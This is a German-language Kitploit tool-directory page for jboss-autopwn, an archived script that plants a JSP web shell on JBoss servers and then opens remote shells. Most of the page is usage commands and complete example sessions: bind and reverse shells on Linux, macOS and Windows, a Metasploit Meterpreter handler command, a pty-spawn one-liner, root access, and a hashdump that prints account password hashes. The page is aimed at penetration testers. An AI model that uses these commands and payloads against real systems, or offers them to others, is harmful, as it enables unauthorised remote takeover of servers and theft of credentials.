Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
jboss-autopwn — Ein JBoss-Skript zum Erhalten von Remote-Shell-Zugriff | Kitploit
Tools/GitHubGitHub/spiderlabs/jboss-autopwn
Payload-GenerierungExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsCommand and ControlRemote-Access-ToolArchived
GitHubspiderlabs/jboss-autopwn

jboss-autopwn

Ein JBoss-Skript zum Erhalten von Remote-Shell-Zugriff

Repository anzeigen
177553vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

:⚠️ HINWEIS: Dieses Tool wird nicht mehr aktiv gewartet.

JBoss Autopwn Script Christian G. Papathanasiou http://www.spiderlabs.com

EINFÜHRUNG

Dieses JBoss-Skript stellt eine JSP-Shell auf dem Ziel-JBoss-AS-Server bereit. Nach der Bereitstellung nutzt das Skript seine Upload- und Befehlsausführungsfähigkeit, um eine interaktive Sitzung bereitzustellen.

Funktionen umfassen:

  • Multiplattform-Unterstützung – getestet auf Windows-, Linux- und Mac-Zielen
  • Unterstützung für Bind- und Reverse-Bind-Shells
  • Meterpreter-Shells und VNC-Unterstützung für Windows-Ziele

INSTALLATION

Abhängigkeiten umfassen

  • Netcat
  • Curl
  • Metasploit v3, installiert im aktuellen Pfad als "framework3"

VERWENDUNG

Verwenden Sie e.sh für *nix-Ziele, die bind_tcp und reverse_tcp verwenden

./e.sh target_ip tcp_port

Verwenden Sie e2.sh für Windows-Ziele, die Metasploit-Windows-Payloads ausführen können

/e2.sh target_ip tcp_port

BEISPIELE

Linux Bind-Shell:

[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich in /tmp erstellt [x] .war-Datei wird bereitgestellt: http://192.168.1.2:8080/browser/browser/browser.jsp [x] Ausführung als Benutzer...: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [x] Server uname...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux [!] Möchten Sie eine Reverse- oder eine Bind-Shell hochladen? bind [!] Auf welchem Port soll die Bind-Shell lauschen? 31337 [x] Lade Bind-Shell-Payload hoch.. [x] Prüfe, ob der Upload erfolgreich war... -rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload [x] Sie sollten eine Bind-Shell auf 192.168.1.2:31337 haben.. [x] Sie werden in eine Shell gesteckt... Connection to 192.168.1.2 31337 port [tcp/*] succeeded! id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) python -c 'import pty; pty.spawn("/bin/bash")' [root@nitrogen /]# vollständig interaktive Shell :-)

Tool herunterladen

Linux Reverse-Shell:

[root@nitrogen jboss]# nc -lv 31337 & [1] 15536 [root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich in /tmp erstellt [x] .war-Datei wird bereitgestellt: http://192.168.1.2:8080/browser/browser/browser.jsp [x] Ausführung als Benutzer...: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [x] Server uname...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux [!] Möchten Sie eine Reverse- oder eine Bind-Shell hochladen? reverse [!] Auf welchem Port möchten Sie die Reverse-Shell empfangen? 31337 [x] Lade Reverse-Shell-Payload hoch.. [x] Prüfe, ob der Upload erfolgreich war... -rwxrwxrwx 1 root root 157 2009-11-22 19:49 /tmp/payload Connection from 192.168.1.2 port 31337 [tcp/*] accepted [x] Sie sollten eine Reverse-Shell auf localhost:31337 haben.. [root@nitrogen jboss]# jobs [1]+ Running nc -lv 31337 & [root@nitrogen jboss]# fg 1 nc -lv 31337 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) python -c 'import pty; pty.spawn("/bin/bash")'; [root@nitrogen /]# vollständig interaktives tty :-) full interactive tty :-)

Gegen MacOS X (Bind-Shell):

[root@nitrogen jboss]# ./e.sh 192.168.1.5 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich in /tmp erstellt [x] .war-Datei wird bereitgestellt: http://192.168.1.5:8080/browser/browser/browser.jsp [x] Ausführung als Benutzer...: uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) [x] Server uname...: Darwin helium-2.tiscali.co.uk 9.7.1 Darwin Kernel Version 9.7.1: Thu Apr 23 13:52:18 PDT 2009; root:xnu-1228.14.1~1/RELEASE_I386 i386 [!] Möchten Sie eine Reverse- oder eine Bind-Shell hochladen? bind [!] Auf welchem Port soll die Bind-Shell lauschen? 31337 [x] Lade Bind-Shell-Payload hoch.. [x] Prüfe, ob der Upload erfolgreich war... -rwxrwxrwx 1 root wheel 172 22 Nov 19:58 /tmp/payload [x] Sie sollten eine Bind-Shell auf 192.168.1.5:31337 haben.. [x] Sie werden in eine Shell gesteckt... Connection to 192.168.1.5 31337 port [tcp/*] succeeded! id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) python -c 'import pty; pty.spawn("/bin/bash")' bash-3.2# id id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) bash-3.2#

Ebenso für die Reverse-Shell.

Windows Bind-Shell:

[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich auf C: erstellt [x] .war-Datei wird bereitgestellt: [x] Web-Shell aktiviert!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Servername...: Host Name . . . . . . . . . . . . : aquarius [x] Möchten Sie eine Reverse- oder Bind-Shell oder VNC (Bind)? bind [x] Auf welchem Port soll Ihre Bind-Shell lauschen? 31337 [x] Lade Bind-Shell-Payload hoch.. [x] Prüfe, ob die Bind-Shell korrekt hochgeladen wurde.. [x] Bind-Shell hochgeladen: 22/11/2009 18:35 87,552 payload.exe [x] Führe Bind-Shell aus... [x] Bind-Shell ausgeführt! [x] Wechsle zu Metasploit.... [] Started bind handler [] Starting the payload handler... [*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337)

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\chris\Desktop\jboss-4.2.3.GA\server\default\tmp\deploy\tmp8376972724011216327browserwin-exp.war>

Windows Reverse-Shell mit einem Metasploit-Meterpreter-Payload:

[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich auf C: erstellt [x] .war-Datei wird bereitgestellt: [x] Web-Shell aktiviert!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Servername...: Host Name . . . . . . . . . . . . : aquarius [x] Möchten Sie eine Reverse- oder Bind-Shell oder VNC (Bind)? reverse [x] Auf welchem Port möchten Sie Ihre Reverse-Shell empfangen? 31337 [x] Lade Reverse-Shell-Payload hoch.. [x] Prüfe, ob die Reverse-Shell korrekt hochgeladen wurde.. [x] Reverse-Shell hochgeladen: 22/11/2009 18:46 87,552 payload.exe [x] Sie haben jetzt 20 Sekunden, um Metasploit zu starten, bevor ich eine Reverse-Shell zurücksende.. ctrl-z, bg, dann eingeben: framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E [x] Führe Reverse-Shell aus... [x] Reverse-Shell ausgeführt! [root@nitrogen jboss]#

In Terminal 2:

[root@nitrogen jboss]# framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E

[] Please wait while we load the module tree... [] Started reverse handler on port 31337 [] Starting the payload handler... [] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.1.2:31337 -> 192.168.1.225:1266)

meterpreter > use priv Loading extension priv...success. meterpreter > hashdump Administrator:500:xxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxx::: chris:1005:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1004:5cb061f95caf6a9dc7d1bb971b333632:4ac4ee4210529e17665db586df844736::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:293c804ee7b7f93b3919344842b9c98a::: vmware_user:1007:aad3b435b51404eeaad3b435b51404ee:a9fa3213d080de5533c7572775a149f5::: meterpreter >

Windows VNC-Shell:

[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich auf C: erstellt [x] .war-Datei wird bereitgestellt: [x] Web-Shell aktiviert!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Servername...: Host Name . . . . . . . . . . . . : aquarius [x] Möchten Sie eine Reverse- oder Bind-Shell oder VNC (Bind)? vnc [x] Auf welchem Port soll Ihre VNC-Shell lauschen? 21 [x] Lade VNC-Shell-Payload hoch.. [x] Prüfe, ob die VNC-Shell korrekt hochgeladen wurde.. [x] VNC-Shell hochgeladen: 22/11/2009 19:14 87,552 payload.exe [x] Führe VNC-Shell aus... [x] VNC-Shell ausgeführt! [x] Wechsle zu Metasploit.... [] Started bind handler [] Starting the payload handler... [] Sending stage (197120 bytes) [] Starting local TCP relay on 127.0.0.1:5900... [] Local TCP relay started. [] Launched vnciewer in the background. [*] VNC Server session 1 opened (192.168.1.2:52682 -> 192.168.1.225:21)

[*] VNC connection closed.

[root@nitrogen jboss]#

VNC-Fenster öffnet sich hier.. :-)

URHEBERRECHT

JBoss Autopwn - Ein JBoss-Skript zur Erlangung eines Remote-Shell-Zugriffs Erstellt von Christian G. Papathanasiou Copyright (C) 2009-2011 Trustwave Holdings, Inc.

Dieses Programm ist freie Software; Sie können es unter den Bedingungen der GNU General Public License, wie von der Free Software Foundation veröffentlicht, weitergeben und/oder modifizieren; entweder Version 2 der Lizenz oder (nach Ihrer Wahl) jede spätere Version.

Dieses Programm wird in der Hoffnung verteilt, dass es nützlich ist, aber OHNE JEDE GEWÄHR; sogar ohne die implizite Gewähr der MARKTGÄNGIGKEIT oder der EIGNUNG FÜR EINEN BESTIMMTEN ZWECK. Siehe die GNU General Public License für weitere Details.

Sie sollten eine Kopie der GNU General Public License zusammen mit diesem Programm erhalten haben; falls nicht, schreiben Sie an die Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.